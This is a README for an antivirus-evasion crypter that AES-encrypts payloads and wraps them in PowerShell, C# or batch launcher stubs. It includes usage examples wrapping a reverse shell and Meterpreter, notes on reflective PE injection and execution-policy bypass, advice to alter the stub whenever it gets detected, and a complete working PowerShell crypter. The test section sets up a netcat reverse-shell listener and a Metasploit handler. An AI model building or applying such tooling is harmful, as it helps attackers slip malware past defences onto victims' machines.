:performing_arts: Antivirus evasion based on changing the file signature via AES encryption, with PowerShell and C# AV evasion templates that support executable and PowerShell payloads and produce Windows executable, PowerShell or batch output. Developed with PowerShell on Linux for Windows targets :)
Buzzwords: antivirus evasion, AV evasion, crypter, AES encryption, ReflectivePEInjection, PowerShell execution policy bypass
https://github.com/loadenmb/tvasion
```text
./tvasion.ps1 -h
tvasion: AES based anti virus evasion

./tvasion.ps1 -t (exe|bat|ps1|b64ps1|b64) [PAYLOAD (exe|ps1)]  OR  ./tvasion.ps1 [PAYLOAD (exe|ps1)] -t (exe|bat|ps1|b64ps1|b64)

parameter:
    [PAYLOAD (exe|ps1)]            input file path. requires: exe, ps1                    required
    -t (exe|ps1|bat|b64ps1|b64)    output file type: exe, ps1, bat, b64ps1, b64            required
    -i (PATH)                      path to icon. requires: .exe output (-t exe)            optional
    -f (PATH)                      path to template                                        optional
    -o (PATH)                      set output directory. default is ./out/                 optional
    -d                             generate debug output                                   optional
    -h                             display this help                                       optional

examples:
    ./tvasion.ps1 -t exe tests/ReverseShell.ps1                          # generate windows executable (.exe) from powershell
    ./tvasion.ps1 -t exe out/Meterpreter_amd64.exe -i tests/ghost.ico    # generate windows executable (.exe) from executable, custom icon (-i)
    ./tvasion.ps1 -t bat tests/ReverseShell.ps1                          # generate batch (.bat) from powershell
    ./tvasion.ps1 -t ps1 out/Meterpreter_amd64.exe -f mytpl1.ps1 -o ../ -d   # .exe -> .ps1, custom template (-f), out dir (-o), debug (-d)
```
Generated files are written to the ./out directory. See more examples in the test file.
Dependencies:

```shell
# set up PowerShell for Linux (see link above); run as root
# install compiler dependencies (optional, required for executable output)
apt-get install -y mono-mcs
# clone with git
git clone https://github.com/loadenmb/tvasion.git
```
The payload itself is AES encrypted, so the only cleartext a static AV scanner sees is the decryption template. If the generated output gets flagged, change the AES decryption template source code (variable names, statement order, how key and ciphertext are embedded) so that the output no longer matches the signature.
The C# and PowerShell templates in the ./templates/ directory basically do:

decode -> decrypt -> launch payload

Which template needs changes depends on the input and output type:
| payload type | output type | template from ./templates/ folder | details |
|---|---|---|---|
| powershell | powershell | default.ps1 | Invoke-Expression |
| executable | powershell | default_exe.ps1 | Invoke-Expression + ReflectivePEInjection (*1) |
| executable | executable | default_exe.cs | PEInjection (*1) |
| powershell | executable | default.cs | PowerShell execution policy bypass with -Enc (*2) |
| powershell | batch | default_bat.ps1 + default.bat | PowerShell execution policy bypass with -C + Invoke-Expression |
| executable | batch | default_exe_bat.ps1 + default.bat | PowerShell execution policy bypass with -C + Invoke-Expression + ReflectivePEInjection (*1) |
| powershell | base64 powershell | default.ps1 | Invoke-Expression |
| executable | base64 powershell | default_exe.ps1 | Invoke-Expression + ReflectivePEInjection (*1) |

(*1) Not all binaries work with reflective PE injection; Meterpreter and mimikatz do. See DEP, ASLR, and what to do against them.
(*2) Payload size is limited by the maximum length of ProcessStartInfo.Arguments, because the whole encoded script is passed on the command line (Windows caps a command line at 32,767 characters). See TODO.
./templates/lib/ contains helpers that are encrypted together with the payload, so they are never visible to a static scanner. You do not need to change these files for a successful AV evasion.
The payload is processed by tvasion.ps1 like this, depending on the input and output type:

- .ps1 -> .ps1: payload -> AES encryption -> base64 encoding -> pasted into PowerShell script
- .ps1 -> .exe: payload -> AES encryption -> base64 encoding -> base64 encoding -> pasted & compiled into C# Windows executable
- .ps1 | .exe -> .bat: payload -> AES encryption -> base64 encoding -> pasted into batch file
- .exe -> .exe: payload -> gzip compression -> base64 encoding -> pasted & compiled into C# .NET assembly -> AES encryption -> base64 encoding -> pasted & compiled into C# Windows executable
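As an added example (not tvasion's own code or one of its templates), the following PowerShell builds the .ps1 -> .ps1 path end to end: it AES-encrypts a script with a freshly generated key, base64-encodes key, IV and ciphertext, and pastes them into a stub that does decode -> decrypt -> Invoke-Expression, which is the shape the templates in ./templates/ follow. A second function measures what the -Enc path from the table above would put on the command line, which is where the (*2) size limit bites. The function names, the stub's variable names, the benign sample payload and the powershell.exe switches used in the length check are assumptions.

```powershell
# Added example, not tvasion's own code: the .ps1 -> .ps1 crypter path
# (AES encrypt -> base64 -> paste into a decode/decrypt/launch stub).
# Function names, stub variable names and the sample payload are assumptions.

function New-EncryptedPayload {
    param(
        [Parameter(Mandatory)] [string] $PayloadPath,   # PowerShell script to protect
        [Parameter(Mandatory)] [string] $OutputPath     # generated stub (.ps1)
    )
    # ReadAllText strips a BOM; the stub decodes with the same UTF-8 encoding
    $plain = [System.Text.Encoding]::UTF8.GetBytes([System.IO.File]::ReadAllText($PayloadPath))

    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.KeySize = 256
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.GenerateKey()   # random key and IV per build, so every output carries a new ciphertext
    $aes.GenerateIV()
    $cipher = $aes.CreateEncryptor().TransformFinalBlock($plain, 0, $plain.Length)

    $b64Key  = [Convert]::ToBase64String($aes.Key)
    $b64IV   = [Convert]::ToBase64String($aes.IV)
    $b64Data = [Convert]::ToBase64String($cipher)
    $aes.Dispose()

    # The stub is the only cleartext a static scanner sees; its variable names,
    # statement order and API calls are what a signature matches on, which is
    # why the decryption template is the part to edit when output gets flagged.
    $stub = @"
`$k = [Convert]::FromBase64String('$b64Key')
`$v = [Convert]::FromBase64String('$b64IV')
`$c = [Convert]::FromBase64String('$b64Data')
`$a = [System.Security.Cryptography.Aes]::Create()
`$a.Key = `$k
`$a.IV  = `$v
`$p = `$a.CreateDecryptor().TransformFinalBlock(`$c, 0, `$c.Length)
Invoke-Expression ([System.Text.Encoding]::UTF8.GetString(`$p))
"@
    [System.IO.File]::WriteAllText($OutputPath, $stub)
}

function Test-CommandLineFit {
    # The -Enc path passes the whole stub as base64(UTF-16LE) in one argument;
    # the batch path does the same with -C. Both run into command-line length limits.
    param([Parameter(Mandatory)] [string] $StubPath)
    $text = [System.IO.File]::ReadAllText($StubPath)
    $b64  = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($text))
    $len  = ('powershell.exe -NoP -W Hidden -Enc ' + $b64).Length
    [pscustomobject]@{
        CommandLineLength = $len
        FitsCreateProcess = $len -lt 32767   # CreateProcess command-line limit (.exe output)
        FitsCmdExe        = $len -lt 8191    # cmd.exe line limit (.bat output)
    }
}

# --- usage with a constructed, benign payload ---
$dir     = [System.IO.Path]::GetTempPath()
$payload = Join-Path $dir 'payload.ps1'
$stubOut = Join-Path $dir 'payload_enc.ps1'
Set-Content -Path $payload -Value 'Write-Output "payload decrypted and running as $([Environment]::UserName)"'

New-EncryptedPayload -PayloadPath $payload -OutputPath $stubOut
Test-CommandLineFit  -StubPath $stubOut   # length, and whether -Enc / -C output would still fit
& $stubOut                                # decode -> decrypt -> Invoke-Expression
```

Because the key is embedded next to the ciphertext, the encryption provides no confidentiality against anyone who reads the stub; its only job is to keep the payload bytes out of the static signature match, which is exactly why a sandbox that executes the stub still sees the original payload.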
| Option | Explanation |
|---|---|
| -t b64ps1 | base64 encoded, AES encrypted PowerShell output ("base64 powershell" in the template table) |
| -t b64 | plain base64 encoded output (encoding only, no encryption) |
For more options see:

```shell
./tvasion.ps1 -h
```
A PowerShell reverse shell is included in the ./tests/ folder for testing purposes.
Run tests:

```shell
# listen for reverse shell connections from ./tests/ReverseShell.ps1
nc -nvlp 4242
# open msfconsole in another terminal; it must be running before tests.ps1 generates the Meterpreter payload
# listen with the metasploit multi handler for windows/meterpreter/reverse_tcp on port 4444 (the Meterpreter generated by tests.ps1 connects to this port)
cd ./tvasion/tests/
msfconsole
resource msf_multihandler.rc
```
Discuss features, report issues or ask questions -> here.
Developers -> fork & pull ;)